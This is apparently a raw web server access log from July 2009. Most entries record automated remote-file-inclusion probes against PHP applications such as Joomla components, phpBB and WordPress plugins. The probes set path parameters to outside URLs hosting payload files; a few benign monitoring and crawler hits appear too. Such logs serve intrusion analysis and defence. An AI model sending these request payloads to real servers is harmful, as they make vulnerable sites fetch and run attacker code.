85.114.133.165 - - [20/Jul/2009:02:38:11 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.114.133.165 - - [20/Jul/2009:02:38:11 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
85.114.133.165 - - [20/Jul/2009:02:38:11 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jul/2009:02:38:19 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:38:19 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:38:19 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:38:52 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:39:01 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.145.92 - - [20/Jul/2009:02:39:17 -0400] "GET /logs/access_log.Q109061900//arcade.php?phpbb_root_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:39:17 -0400] "GET //arcade.php?phpbb_root_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:39:18 -0400] "GET /logs//arcade.php?phpbb_root_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:39:29 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:39:29 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:39:30 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
209.59.12.99 - - [20/Jul/2009:02:40:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.227.249.185 - - [20/Jul/2009:02:41:31 -0400] "GET /logs/access_log.Q109050700/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sks75.rj.pl/media/php.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:42:13 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.114.133.165 - - [20/Jul/2009:02:42:22 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://impeel.com/impeel/wizard/pit-id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jul/2009:02:42:29 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:42:29 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:42:32 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:44:25 -0400] "GET /logs//pub_popup/popup_finduser.php?vsDragonRootPath=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:44:25 -0400] "GET //pub_popup/popup_finduser.php?vsDragonRootPath=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:44:25 -0400] "GET /logs/access_log.Q109062200%20%20//pub_popup/popup_finduser.php?vsDragonRootPath=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:44:38 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:02:44:51 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:45:06 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.68.70 - - [20/Jul/2009:02:45:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0140234F52B48100897201P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.6.155.240 - - [20/Jul/2009:02:45:21 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:45:27 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:45:27 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:45:27 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:45:43 -0400] "GET /logs/access_log.Q109062200//pub_popup/popup_finduser.php?vsDragonRootPath=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:45:43 -0400] "GET /logs//pub_popup/popup_finduser.php?vsDragonRootPath=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:45:43 -0400] "GET //pub_popup/popup_finduser.php?vsDragonRootPath=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:45:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.92 - - [20/Jul/2009:02:46:01 -0400] "GET /logs/error_log.Q109051300%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
123.242.165.138 - - [20/Jul/2009:02:46:08 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:47:44 -0400] "GET /logs/errors.php?error=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:47:44 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:47:44 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:47:44 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:47:44 -0400] "GET /errors.php?error=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:47:47 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:47:48 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:02:47:51 -0400] "GET /logs/access_log.Q109070500%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:02:47:51 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:02:47:51 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:48:09 -0400] "GET /logs/access_log.Q109062200//pub_popup/popup_finduser.php?vsDragonRootPath=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:48:15 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:48:15 -0400] "GET //include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:48:15 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:48:30 -0400] "GET //include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:48:30 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:48:30 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:48:31 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:48:31 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:48:31 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:48:41 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:48:41 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:48:45 -0400] "GET //include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:48:45 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:48:45 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:48:45 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:49:08 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:49:16 -0400] "GET /logs/access_log.Q109062200%20%20//pub_popup/popup_finduser.php?vsDragonRootPath=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.145.92 - - [20/Jul/2009:02:49:18 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:49:18 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:49:18 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:49:18 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
201.232.54.48 - - [20/Jul/2009:02:49:22 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:02:49:22 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:02:49:22 -0400] "GET /logs/access_log.Q109070500/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:49:24 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:49:53 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:49:56 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:49:56 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:49:56 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:49:56 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:50:10 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:16 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:16 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:16 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:16 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:17 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:17 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:17 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:26 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:33 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:33 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 200 10269 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:35 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.249.68.247 - - [20/Jul/2009:02:50:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L013D4B404E0406001C9108V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.143.98.5 - - [20/Jul/2009:02:50:35 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:35 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:36 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:36 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:36 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:39 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
98.116.62.213 - - [20/Jul/2009:02:50:40 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 200 10269 "-" "Mozilla/5.0"
98.116.62.213 - - [20/Jul/2009:02:50:40 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
98.116.62.213 - - [20/Jul/2009:02:50:40 -0400] "GET /logs/access_log.Q109070200////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:40 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:42 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:42 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:43 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:47 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:50:48 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:50:48 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:50:48 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
98.116.62.213 - - [20/Jul/2009:02:50:48 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
98.116.62.213 - - [20/Jul/2009:02:50:48 -0400] "GET /logs/access_log.Q109070200////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
98.116.62.213 - - [20/Jul/2009:02:50:51 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 200 10269 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:52 -0400] "GET /logs/access_log.Q109052100////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:50:52 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:50:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [20/Jul/2009:02:50:59 -0400] "GET /logs/access_log.Q109052100////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:59 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:59 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 200 10269 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:59 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:59 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:50:59 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
